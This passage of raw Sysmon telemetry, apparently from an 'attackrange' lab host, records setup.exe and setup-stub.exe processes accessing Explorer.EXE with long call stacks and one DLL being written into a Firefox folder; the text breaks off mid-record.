13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000014938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000014937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 11241100x800000000000000014935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\libGLESv2.dll2021-01-18 13:59:52.380 10341000x800000000000000014934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C: